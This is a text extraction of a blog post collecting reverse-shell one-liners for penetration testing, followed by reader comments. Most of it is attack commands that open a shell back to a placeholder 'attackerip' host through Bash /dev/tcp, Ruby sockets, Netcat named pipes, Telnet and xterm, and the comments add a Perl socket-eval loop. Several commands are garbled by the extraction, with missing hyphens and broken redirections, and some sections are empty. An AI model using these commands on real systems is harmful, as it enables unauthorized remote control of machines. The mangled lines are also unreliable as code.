Professional Documents
Culture Documents
BSCKDOOR - Reverse Shells One-Liners PDF
BSCKDOOR - Reverse Shells One-Liners PDF
BSCKDOOR - Reverse Shells One-Liners PDF
If you’re lucky enough to find a command execution vulnerability during a penetration test, pretty soon
afterwards you’ll probably want an interactive shell.
[...] your next step is likely to be either throwing back a reverse shell or binding a shell to a TCP
port.
Your options for creating a reverse shell are limited by the scripting languages installed on the target
system – though you could probably upload a binary program too if you’re suitably well prepared.
First of all, on your machine, set up a listener, where attackerip is your IP address and 4444 is an arbitrary TCP
port unfiltered by the target's firewall:
attacker$ nc l v attackerip 4444
Bash
exec /bin/bash 0&0 2>&0
Or:
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
Or:
exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done
See also Reverse Shell With Bash [http://www.gnucitizen.org/blog/reverse-shell-with-bash/] from GNUCITIZEN blog
[http://www.gnucitizen.org/blog/] .
Perl
Ruby
http://bernardodamele.blogspot.com.br/2011/09/reverse-shells-one-liners.html 1/5
4/12/2018 Reverse shells one-liners
ruby rsocket e
'c=TCPSocket.new("attackerip","4444");while(cmd=c.gets);IO.popen(cmd,"r")
{|io|c.print io.read}end'
Netcat
Others possible Netcat reverse shells, depending on the Netcat version and compilation flags:
nc c /bin/sh attackerip 4444
Or:
/bin/sh | nc attackerip 4444
Or:
rm f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p
Telnet
rm f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p
Or:
telnet attackerip 4444 | /bin/bash | telnet attackerip 4445 # Remember to
listen on your machine also on port 4445/tcp
xterm
To catch incoming xterm, start an open X Server on your system (:1 - which listens on TCP port 6001). One way to do
this is with Xnest [http://www.xfree86.org/4.4.0/Xnest.1.html] :
Xnest :1
xterm display 127.0.0.1:1 # Run this OUTSIDE the Xnest
xhost +targetip # Run this INSIDE the spawned xterm on the open
X Server
Then on the target, assuming that xterm is installed, connect back to the open X Server on your system:
http://bernardodamele.blogspot.com.br/2011/09/reverse-shells-one-liners.html 2/5
4/12/2018 Reverse shells one-liners
xterm display attackerip:1
Or:
$ DISPLAY=attackerip:0 xterm
Note that on Solaris xterm path is usually not within the PATH environment variable, you need to specify its filepath:
/usr/openwin/bin/xterm display attackerip:1
9 View comments
#!/usr/bin/python
# imports here
import socket,subprocess
http://bernardodamele.blogspot.com.br/2011/09/reverse-shells-one-liners.html 3/5
4/12/2018 Reverse shells one-liners
Cheers,
@DGleebits
Reply
print $sock eval(<$sock>) while ($sock ||= IO::Socket::INET->new(PeerAddr => "127.0.0.1", PeerPort => "23666"))
Reply
Netcat
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p 2>&1
Telnet
rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p 2>&1
Reply
Replies
Reply
http://bernardodamele.blogspot.com.br/2011/09/reverse-shells-one-liners.html 4/5
4/12/2018 Reverse shells one-liners
Publish Preview Notify me
http://bernardodamele.blogspot.com.br/2011/09/reverse-shells-one-liners.html 5/5